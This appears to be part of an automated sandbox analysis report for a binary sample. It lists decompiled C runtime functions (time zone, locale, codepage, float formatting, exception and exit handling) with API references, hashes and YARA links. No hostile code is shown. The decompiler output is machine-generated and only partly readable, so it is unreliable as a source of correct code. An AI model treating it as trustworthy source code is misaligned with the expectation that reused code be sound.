Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )OmU$BLm$t!OmE
API String ID: 4212172061-2756785005
Opcode ID: e52c2f99e368c53a6bc2677ca8953e182ad2cb8a6903d09800f6c02570e081b6
Instruction ID: d1847a60c6be48611069323678302f6c1a8618bea2940531ff807033f30b250a
Opcode Fuzzy Hash: e52c2f99e368c53a6bc2677ca8953e182ad2cb8a6903d09800f6c02570e081b6
Instruction Fuzzy Hash: C961F531604306AAEB54EF74CC91FB673A8EF85714F11446EEA18DB280FB74ED458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D4D8951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6D4D822B();
				_t1 =  &_v8; // 0x6d4f2130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6D4D8289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4C2188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6d54506c; // 0x9d44929c
					_v56 = _t38 ^ _t106;
					 *0x6d545384 =  *0x6d545384 | 0xffffffff;
					 *0x6d545378 =  *0x6d545378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6d547a10 = 0;
					_t42 = E6D4D1216(0x6d4f2130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6d4f2130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6D4CF26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6D4D1216(0x6d4f2130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6d4f2130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6D4CCBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6D4CCBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6D4D8951(0x6d4f2130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6D4D877C(0x6d4f2130, _t90, __eflags);
						}
					}
					E6D4CCBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6D49F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6D4D8231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6D4D825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6D4CCBD3( *0x6d547a08);
							 *0x6d547a08 = 0;
							 *_t107 = 0x6d547a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6d547a18 * 0x3c;
								_t88 =  *0x6d547a6c; // 0x0
								_push(__edi);
								 *0x6d547a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6d547a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6d547ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6d547ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6D4C3CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6d547a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6d547a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6D4D8225()) = _v8;
							 *(E6D4D8219()) = _v12;
							_t61 = E6D4D821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6d4d8951
0x6d4d8960
0x6d4d8964
0x6d4d8967
0x6d4d896b
0x6d4d896e
0x6d4d8971
0x6d4d8976
0x6d4d8979
0x6d4d8aa1
0x6d4d8aa1
0x6d4d8aa2
0x6d4d8aa3
0x6d4d8aa4
0x6d4d8aa5
0x6d4d8aa6
0x6d4d8aab
0x6d4d8aaf
0x6d4d8ab7
0x6d4d8abe
0x6d4d8ac1
0x6d4d8ace
0x6d4d8ad5
0x6d4d8ad6
0x6d4d8add
0x6d4d8aec
0x6d4d8af3
0x6d4d8afb
0x6d4d8afd
0x6d4d8b07
0x6d4d8b0a
0x6d4d8b17
0x6d4d8b1a
0x6d4d8b1c
0x6d4d8b35
0x6d4d8b3d
0x6d4d8b3f
0x6d4d8b45
0x6d4d8b4a
0x6d4d8b41
0x6d4d8b41
0x00000000
0x6d4d8b41
0x6d4d8b1e
0x6d4d8b1e
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b4c
0x6d4d8aff
0x6d4d8aff
0x6d4d8aff
0x6d4d8b59
0x6d4d8b5b
0x6d4d8b5d
0x6d4d8b5f
0x6d4d8b6f
0x6d4d8b6f
0x6d4d8b61
0x6d4d8b61
0x6d4d8b64
0x00000000
0x6d4d8b66
0x6d4d8b66
0x6d4d8b67
0x6d4d8b6c
0x6d4d8b64
0x6d4d8b75
0x6d4d8b80
0x6d4d8b8b
0x6d4d897f
0x6d4d8983
0x6d4d8988
0x6d4d898b
0x00000000
0x6d4d8991
0x6d4d8995
0x6d4d899a
0x6d4d899d
0x00000000
0x6d4d89a3
0x6d4d89a9
0x6d4d89ae
0x6d4d89b4
0x6d4d89c4
0x6d4d89ca
0x6d4d89d1
0x6d4d89d7
0x6d4d89db
0x6d4d89e1
0x6d4d89e4
0x6d4d89eb
0x6d4d89f2
0x6d4d89f2
0x6d4d89f5
0x6d4d89fc
0x6d4d8a14
0x6d4d8a14
0x6d4d8a17
0x6d4d89fe
0x6d4d89fe
0x6d4d8a05
0x00000000
0x6d4d8a07
0x6d4d8a09
0x6d4d8a0f
0x6d4d8a0f
0x6d4d8a05
0x6d4d8a1f
0x6d4d8a3b
0x6d4d8a4b
0x6d4d8a42
0x6d4d8a44
0x6d4d8a44
0x6d4d8a69
0x6d4d8a7b
0x6d4d8a70
0x6d4d8a73
0x6d4d8a73
0x6d4d8a69
0x6d4d8a85
0x6d4d8a8f
0x6d4d8a94
0x6d4d8a99
0x6d4d8aa0
0x6d4d8aa0
0x6d4d899d
0x6d4d898b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60
_free.LIBCMT ref: 6D4D89A9

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4D8B75

Strings

0!Om, xrefs: 6D4D8AD8
0!Om, xrefs: 6D4D8964, 6D4D896A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!Om$0!Om
API String ID: 1286116820-1120582717
Opcode ID: 11b8775a895fe89b20f50866c99e88db4d35c023c14f5d3405450eb113969c94
Instruction ID: 956a576b3449e319cdce558cebb04be028015dbfeedde5abf5a636d44d06db1d
Opcode Fuzzy Hash: 11b8775a895fe89b20f50866c99e88db4d35c023c14f5d3405450eb113969c94
Instruction Fuzzy Hash: 6351D671D0421AAFDF40DFA98C90EBEBBB8EF41314B21566AE560A7740D7309E41CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6D4DE518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6d4de837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6d4f2f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6d4f2f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6D4CBF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6d4de837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6d4de51d
0x6d4de51e
0x6d4de525
0x6d4de5c9
0x6d4de5cf
0x6d4de5e2
0x6d4de5e8
0x6d4de5ed
0x6d4de5ef
0x6d4de5ef
0x6d4de5f5
0x6d4de5fa
0x6d4de5fa
0x6d4de5e4
0x6d4de5e4
0x00000000
0x6d4de5e4
0x6d4de52b
0x6d4de530
0x00000000
0x00000000
0x6d4de536
0x6d4de53b
0x6d4de53d
0x6d4de53d
0x6d4de543
0x00000000
0x00000000
0x6d4de548
0x6d4de55f
0x6d4de55f
0x6d4de568
0x6d4de56a
0x00000000
0x00000000
0x6d4de56c
0x6d4de571
0x6d4de573
0x6d4de573
0x6d4de579
0x00000000
0x00000000
0x6d4de57e
0x6d4de59c
0x6d4de59e
0x6d4de5c1
0x00000000
0x6d4de5c6
0x6d4de5a6
0x6d4de5b9
0x00000000
0x00000000
0x6d4de5bb
0x00000000
0x6d4de5bb
0x6d4de580
0x6d4de588
0x00000000
0x00000000
0x6d4de58a
0x6d4de58d
0x6d4de593
0x00000000
0x00000000
0x00000000
0x6d4de595
0x6d4de597
0x6d4de599
0x00000000
0x6d4de599
0x6d4de54a
0x6d4de552
0x00000000
0x00000000
0x6d4de554
0x6d4de557
0x6d4de55d
0x00000000
0x00000000
0x00000000
0x6d4de55d
0x6d4de563
0x6d4de565
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6D4DE837,?,00000000), ref: 6D4DE5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6D4DE837,?,00000000), ref: 6D4DE5DA
GetACP.KERNEL32(?,?,6D4DE837,?,00000000), ref: 6D4DE5EF

Strings

7Mm, xrefs: 6D4DE5CF, 6D4DE5A6
OCP, xrefs: 6D4DE56C
ACP, xrefs: 6D4DE536

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: 7Mm$ACP$OCP
API String ID: 2299586839-141736179
Opcode ID: 6bea2a14342b2a794d73dea8018a5d0801cd727a4be483fb57222a5feb8d4c2c
Instruction ID: 92873ef5ecc39df3f6a13fbd94e680efc550b98a484e4095e32836cd61de1e8e
Opcode Fuzzy Hash: 6bea2a14342b2a794d73dea8018a5d0801cd727a4be483fb57222a5feb8d4c2c
Instruction Fuzzy Hash: 1321E222604102EAE791CF98C9B0E97F7B6AF45BA0B628439E989C7304F732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E02BC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6D4E0402

Strings

1#IND, xrefs: 6D4E15FA
1#QNAN, xrefs: 6D4E1608
1#INF, xrefs: 6D4E160F
1#SNAN, xrefs: 6D4E1601

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a7ce2d940f853ae2dd2f1d300708b73688243929f9a9eb013d7b0d982b055047
Instruction ID: 15e4a3bffaa596f97b42b81848f03ea7a1ea33eef4f279071299180c876e4ee3
Opcode Fuzzy Hash: a7ce2d940f853ae2dd2f1d300708b73688243929f9a9eb013d7b0d982b055047
Instruction Fuzzy Hash: 1AC26B71E086299FDB25CF28DC40BE9B3B5EB45386F1441EAD45DE7240EB74AE818F80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE19F, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD65E
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D4DE1F3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D4DE244
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D4DE304

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: a00c46d0d96623b851ee64e1b78a829193f7f95f43b60282b9de56604f4555fa
Instruction ID: cba7a8f7bc3ae2ee80ba3f065aa11bb29487fc5187b96b4477d6c3881e2c72d9
Opcode Fuzzy Hash: a00c46d0d96623b851ee64e1b78a829193f7f95f43b60282b9de56604f4555fa
Instruction Fuzzy Hash: 1B61AE315442079BEB998E24CCE2FBAB7B8FF04314F204079EA55C6684EB75DD91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1F6D, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6D4875D9), ref: 6D4C2065
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6D4875D9), ref: 6D4C206F
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,6D4875D9), ref: 6D4C207C

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 688bad302cdb109c75f64462e5582ebfd07e6c42e2799badf8bc3859c2f1ad96
Instruction ID: f862ca60177a30745e864736a66d097de536e00fba0b9c260566305020518af3
Opcode Fuzzy Hash: 688bad302cdb109c75f64462e5582ebfd07e6c42e2799badf8bc3859c2f1ad96
Instruction Fuzzy Hash: 7131A5B591122DABCB21DF65D888B9DBBB8BF08310F5042DAE51CA7350EB709F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C966F, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6D4C9645,?,6D542D28,0000000C,6D4C978A,?), ref: 6D4C9690
TerminateProcess.KERNEL32(00000000,?,6D4C9645,?,6D542D28,0000000C,6D4C978A,?), ref: 6D4C9697
ExitProcess.KERNEL32 ref: 6D4C96A9

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 02458bc0d5bfe4efd127b6900da5d7b12e0e5454f4a8ba9ef7d0bf877c5c5945
Instruction ID: 0401ef0d09d0a1ac7b0fe404c6be9bd4ab935183bd7245751abf54b81fad5826
Opcode Fuzzy Hash: 02458bc0d5bfe4efd127b6900da5d7b12e0e5454f4a8ba9ef7d0bf877c5c5945
Instruction Fuzzy Hash: CCE0B635105208BFCF01AF54CA19E597B79EF4528AB16442CF909CA262CB36DD52CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE077, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

EnumSystemLocalesW.KERNEL32(6D4DE19F,00000001,00000000,?,;Lm,?,6D4DE7CC,00000000,?,?,?), ref: 6D4DE0E9

Strings

;Lm, xrefs: 6D4DE07C

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;Lm
API String ID: 1084509184-2460166304
Opcode ID: a01d7ce6899f01b077edb697c67da56ccc4d1406274b6b31da73e3065401a97e
Instruction ID: e826f2226161c801edb02cb39c0873ad1c148eb4890556034c40b08999f4a735
Opcode Fuzzy Hash: a01d7ce6899f01b077edb697c67da56ccc4d1406274b6b31da73e3065401a97e
Instruction Fuzzy Hash: 5411863A2047059FDB189F3988E1A7ABBA2FF84358B15443DDA8687B40D775A942C740

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDF65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD65E
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,BLm,00000000,?), ref: 6D4DDFB9

Strings

BLm, xrefs: 6D4DDE8F, 6D4DDED7, 6D4DDF7F
t!OmE, xrefs: 6D4DDE09
)OmU, xrefs: 6D4DDDD4

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: )OmU$BLm$t!OmE
API String ID: 1663032902-2756785005
Opcode ID: 56fa4d7a46e89fe99183ebc7db3a217360b873f9c14883617469d1e527fdc13c
Instruction ID: 24a642a6525144b6b6737ec02a0f4ff1cca1ad21dfbcc0945c52a358443221c1
Opcode Fuzzy Hash: 56fa4d7a46e89fe99183ebc7db3a217360b873f9c14883617469d1e527fdc13c
Instruction Fuzzy Hash: E0F02832A54205ABCB18EE78CC45EBA73ECDF85314F02417EEA06DB240EF74AD0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

EnumSystemLocalesW.KERNEL32(6D4DE3EF,00000001,00000006,?,;Lm,?,6D4DE790,;Lm,?,?,?,?,?,6D4CE03B,?,?), ref: 6D4DE15E

Strings

;Lm, xrefs: 6D4DE117

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;Lm
API String ID: 1084509184-2460166304
Opcode ID: 6ef47349fbaf9956f2b7c5de5d1c46a5b75de63def726e2aeb81c1f0091c691b
Instruction ID: 1182b67e06a8a2c9a677b8e27b6853b056d9c49e30d03a90aac744938aa22eb8
Opcode Fuzzy Hash: 6ef47349fbaf9956f2b7c5de5d1c46a5b75de63def726e2aeb81c1f0091c691b
Instruction Fuzzy Hash: 6BF0C2363043056FD715AE398CD1E7EBBA5EF8176CB15443CFA85CB640D7B1AC418640

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D4323, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6D4CDA1E,?,00000004), ref: 6D4D4376

Strings

GetLocaleInfoEx, xrefs: 6D4D4334, 6D4D433E

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 7d03b0296f953523a1334306b755775dd023289901e398cd6ac30403506fa05d
Instruction ID: b8627adaf834cd4ce4a818e00544ca5cb8c36cc04b5eb7289430c72561b17ee7
